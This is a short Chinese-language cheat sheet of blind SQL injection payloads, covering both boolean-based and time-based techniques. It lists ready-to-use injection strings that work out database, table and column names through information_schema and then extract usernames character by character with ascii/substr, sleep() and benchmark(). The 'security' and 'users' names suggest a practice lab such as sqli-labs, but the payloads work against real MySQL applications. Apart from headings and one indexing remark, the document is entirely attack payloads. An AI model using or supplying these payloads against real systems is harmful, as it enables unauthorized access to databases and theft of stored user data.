跳转至

盲注

布尔盲注

猜数据库

猜数据库字符数
id=1 and length(database())=4 --+

猜数据库
id=1 and ascii(substr(database(),1,1))=115 --+
猜表
猜表的数量
id=1 and (select count (table_name) from information_schema.tables where table_schema=database())=1 --+

猜表名长度
id=1 and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 --+

猜表名
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 --+
猜字段
猜字段数量
id=1 and (select count(column_name) from information_schema.columns where table_name= users)=1

猜字段长度
id=1 and length(substr((select column_name from information_schema.columns where table_name= users limit 0,1),1,1))=1

猜字段
id=1 and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=85+
猜内容
猜内容长度
length((select username from users limit 0,1))=1
    (select length(username) from users limit 0,1)=1

猜内容
id=1 and ascii(substr((select username from users limit 0,1),1,1))=68+  

Notice:

mid() 起始值为1 limit 起始值为0


时间盲注

id=1 or if(ascii(substr(database(),1,1))>0,sleep(1),1) --+

id=1 union select 1,benchmark(1000000,md5('test')),1 from user where userid=1 and ord(substring(username,1,1))=97 /*